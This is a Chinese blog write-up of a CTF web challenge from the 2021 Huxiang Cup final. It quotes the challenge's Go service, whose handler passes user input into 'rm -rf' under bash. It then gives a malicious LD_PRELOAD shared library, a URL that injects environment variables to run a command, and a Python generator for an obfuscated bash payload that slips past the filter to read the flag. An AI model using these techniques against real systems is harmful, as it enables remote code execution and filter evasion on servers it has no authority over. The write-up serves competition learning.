[湖湘杯 2021 final]MultistaeAgency

于 2022-10-24 21:49:42 发布
阅读量191 收藏
点赞数
分类专栏: 比赛wp 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52367015/article/details/126982959
版权

附件

在这里插入图片描述

web下的main.go
在这里插入图片描述
存在三个路径
list展示上传到token下的文件
在这里插入图片描述

upload上传文件并请求内网9091的manage接口
在这里插入图片描述

token:获取token并添加环境变量
在这里插入图片描述
manage接口

func manage(w http.ResponseWriter, r *http.Request) {
	values := r.URL.Query()
	m := values.Get("m")
	if !waf(m) {
		fmt.Fprintf(w, "waf!")
		return
	}
	cmd := fmt.Sprintf("rm -rf uploads/%s", m)
	fmt.Println(cmd)
	command := exec.Command("bash", "-c", cmd)
	outinfo := bytes.Buffer{}
	outerr := bytes.Buffer{}
	command.Stdout = &outinfo
	command.Stderr = &outerr
	err := command.Start()
	res := "ERROR"
	if err != nil {
		fmt.Println(err.Error())
	}
	if err = command.Wait(); err != nil {
		res = outerr.String()
	} else {
		res = outinfo.String()

	}
	fmt.Fprintf(w, res)
}

在这里存在rce的点

其中有一个waf

func waf(c string) bool {
	var t int32
	t = 0
	blacklist := []string{".", "*", "?"}
	for _, s := range c {
		for _, b := range blacklist {
			if b == string(s) {
				return false
			}
		}
		if unicode.IsLetter(s) {
			if t == s {
				continue
			}
			if t == 0 {
				t = s
			} else {
				return false
			}
		}
	}

	return true
}

既然会加载环境变量,可以让其加载恶意的so文件来rce

#include<stdlib.h>
__attribute__((constructor)) void l3yx(){
    unsetenv("LD_PRELOAD");
    system(getenv("_evilcmd"));
}

gcc -shared -fPIC -o evil.so evil.c

大致思路:
通过上传恶意的so文件来rce,先访问/token获取到token的值,因为后面会有检验,upload会将其移动到token目录下,上传会发现其请求/token?http_proxy=127.0.0.1:8080获取到token,也就是proxy代理实现。再去curl内网的9091manage接口,将m参数传入即可得到flag,当然还要先绕过waf

在这里插入图片描述

/token?http_proxy=127.0.0.1:8080&LD_PRELOAD=/code/uploads/2ea6a3a71d0b2db658544f67f1468897/XVlBz&_evilcmd=ls /


from urllib.parse import quote
n = dict()
n[0] = '0'
n[1] = '${##}'
n[2] = '$((${##}<<${##}))'
n[3] = '$(($((${##}<<${##}))#${##}${##}))'
n[4] = '$((${##}<<$((${##}<<${##}))))'
n[5] = '$(($((${##}<<${##}))#${##}0${##}))'
n[6] = '$(($((${##}<<${##}))#${##}${##}0))'
n[7] = '$(($((${##}<<${##}))#${##}${##}${##}))'

f=''

def str_to_oct(cmd):
    s = ""
    for t in cmd:
        o = ('%s' % (oct(ord(t))))[2:]
        s+='\\'+o
    return s

def build(cmd):
    payload = "$0<<<$0\<\<\<\$\\\'"
    s = str_to_oct(cmd).split('\\')
    for _ in s[1:]:
        payload+="\\\\"
        for i in _:
            payload+=n[int(i)]
    return payload+'\\\''

print(quote(quote("123;"+build("cat /flag"))))

在这里插入图片描述

Ki10Moc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021年--湖湘--final
unexpectedthing的博客
04-28 1357
21年湖湘比赛
2021-湖湘final-Web
feng的博客
01-05 2084
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
[CTF复现]湖湘2021
anwen12的博客
12-14 3765
go_web 今天又是学爆guoke哥哥博客的一天 0x01 MultistageAgency 通过看源码 我们发现 这个题是三个服务 su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &" su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &" /code/bin/server 2>&1 >/code/log
2021湖湘WEB
~airrudder~
03-02 822
文章目录2021 湖湘MultistaeAgencyPenetratablevote 2021 湖湘 MultistaeAgency 分析参考文章:2021湖湘决赛-MultistageAgency。 一道 Golang 的题目,附件目录结构如下所示: tree . ├── Dockerfile ├── dist │ ├── index.html │ └── static │ ├── css │ │ ├── app.21c401bdac17302cdde185ab
[HFCTF 2021 Final]easyflask
SopRomeo的博客
04-29 5230
最近看到buu上了几个新题拿一个做做 按照提示得到源码 有个SECRET_KEY 还有个文件读取,这边禁用了黑名单,用绝对路径直接读/proc/self/environ试试 找到秘钥 glzjin22948575858jfjfjufirijidjitg3uiiuuh 继续看源码 下面有个反序列化的操作,思路不难了,pickle反序列化RCE 最好全程都在liunx环境下进行 import pickle from base64 import b64encode import os User = ty
CTF 湖湘 决赛 2021 final.zip
12-07
【CTF 湖湘 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘作为一项知名的CTF比赛,旨在促进网络安全...
final2021:决赛2021
04-09
决赛2021 决赛2021
Solution2021_Final
04-12
《CSS在Solution2021_Final中的应用与实践》 在信息技术领域,CSS(层叠样式表)作为网页设计的核心技术之一,对于构建美观、功能丰富的网页起着至关重要的作用。"Solution2021_Final"项目正是这样一个充分运用CSS...
2023 羊城 final
11-21
附件
final_EDEM2021.2Fluent2021R1coupling.zip
02-25
"final_EDEM 2021.2 Fluent 2021 R1 coupling"这个压缩包文件包含了关于这两个软件如何进行耦合模拟的详细信息,这在工程设计和科学研究中具有广泛的应用价值。 EDEM 2021.2是EDEM软件的最新版本,它提供了一种高度...
第七届“湖湘”网络安全技能大赛免费赛前培训通知
weixin_59086772的博客
10-28 1976
为了深入开展网络安全知识技能宣传普及,提高广大群众对网络安全意识和防护技能”的应对能力,挖掘和培养网络安全全能型人才,加快网络安全人才队伍建设。湖南省委网信办联合相关部门共同举办第七届“湖湘”网络安全技能大赛。 一、组织机构 主办单位:中共湖南省委网络安全和信息化委员会办公室、湖南省教育厅、湖南省广播电视局、湖南省政务管理服务局、湖南省通信管理局、长沙市人民政府 承办单位:中共长沙市委网络安全和信息化委员会办公室、国家网络安全产业园区(长沙)城市网络安全运营中心、奇安星城网络安全运营服.
第八节 函数的连续性与间断点.ppt
07-04
第八节 函数的连续性与间断点
一种开关电源PID增量式算法.c
最新发布
07-05
开关电源
k8s nfs provisioner v4.7.0镜像资源
07-05
部署nfs provisioner v4.7.0镜所需镜像资源包,使用以下方式导入: ctr -n k8s.io image import csi-driver-nfs-v4.7.0.tar
迅风羽毛球俱乐部社交平台的分析与设计(毕业论文,超高质量)
07-05
随着计算机技术的发展,带来社会各行业的进步,信息化逐渐运用到人们的生活中。传统模式的羽毛球俱乐部教学培训满足不了现代人的生活追求,服务质量、服务速度,之前的很多羽毛球俱乐部由于人力、物理、财力等原因,一些网站无法完美的展现它的特色,优势,浪费了很多顾客资源。使用管理系统进行管理,成本大大减小,同时可借助互联网强大的流量入口,因而也降低了推广的难度。因此设计一个管理系统来解决羽毛球俱乐部场地预约、教练预约的问题,一方面可以更好的展现系统直观性,另一方面可以更好的来适应时代的发展。 本文先提出了开发迅风羽毛球俱乐部社交平台管理系统的背景意义,然后通过功能性和非功能性分析阐述本系统的需求,然后从功能设计和数据库设计两方面进行系统的设计建模。在技术设计部分采用了Java作为开发后台的编程语言,客户端使用Jsp技术,数据库选择MySQL,并说明了设计流程。综合表明,本迅风羽毛球俱乐部管理系统满足了羽毛球俱乐部场地预约的基本业务,帮助用户及时在线预定,并为羽毛球俱乐部管理员提供了高效的管理模式。
3.1-3.2.ppt
07-04
3.1-3.2
tomcat配置错误页面
07-05
404页面
ZXMN2A14FTA-VB一款N-Channel沟道SOT23的MOSFET晶体管参数介绍与应用说明
07-05
SOT23;N—Channel沟道,20V;6A;RDS(ON)=24mΩ@VGS=4.5V,VGS=8V;Vth=0.45~1V;
Java开发中static.this.super.final用法
08-23
Java初学者要看看了,Java修饰符轻松搞定!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值